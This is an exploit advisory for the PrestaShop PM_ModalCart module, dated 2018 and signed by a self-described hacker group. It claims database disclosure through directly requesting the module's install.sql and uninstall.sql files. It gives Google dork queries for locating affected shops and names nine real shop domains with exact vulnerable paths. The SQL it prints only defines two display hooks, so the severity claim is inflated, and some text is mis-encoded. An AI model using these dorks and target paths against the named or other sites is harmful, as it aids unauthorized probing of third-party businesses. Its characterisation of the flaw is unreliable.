PrestaShop PM_ModalCart version 1.6.1.4 suffers from a database disclosure vulnerability.
d470400ffc2213bdbbab683cdb5057b1#################################################################################################
# Exploit Title : PrestaShop PM_ModalCart 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+
prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 -
1.6.1.4A+-
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''A(c)2018 Recettes & Cabas | Tous droits rA(c)servA(c)s''
intext:''Agence de communication - Une rA(c)alisation Communikey''
intext:''cron module by samdha.net''
intext:''A(c) 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Exploit :
/modules/pm_modalcart/install.sql
/modules/pm_modalcart/uninstall.sql
#################################################################################################
# Example SQL Database Information Exposure =>
install.sql =>
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`)
VALUES ('MCAbove',
'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`)
VALUES ('MCBelow',
'Modalcart below', 'On modal, below the product added to cart', 1);
uninstall.sql
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';
#################################################################################################
# Example Vulnerable Sites =>
[+] recettesetcabas.com/modules/pm_modalcart/install.sql
[+] boutique-solidaire.com/modules/pm_modalcart/install.sql
[+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql
[+] kakicrazy.fr/modules/pm_modalcart/install.sql
[+] visuashop.fr/modules/pm_modalcart/install.sql
[+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql
[+] km-justering.dk/modules/pm_modalcart/install.sql
[+] securedirect.dk/modules/pm_modalcart/install.sql
[+] griffin.ch/modules/pm_modalcart/uninstall.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team
#################################################################################################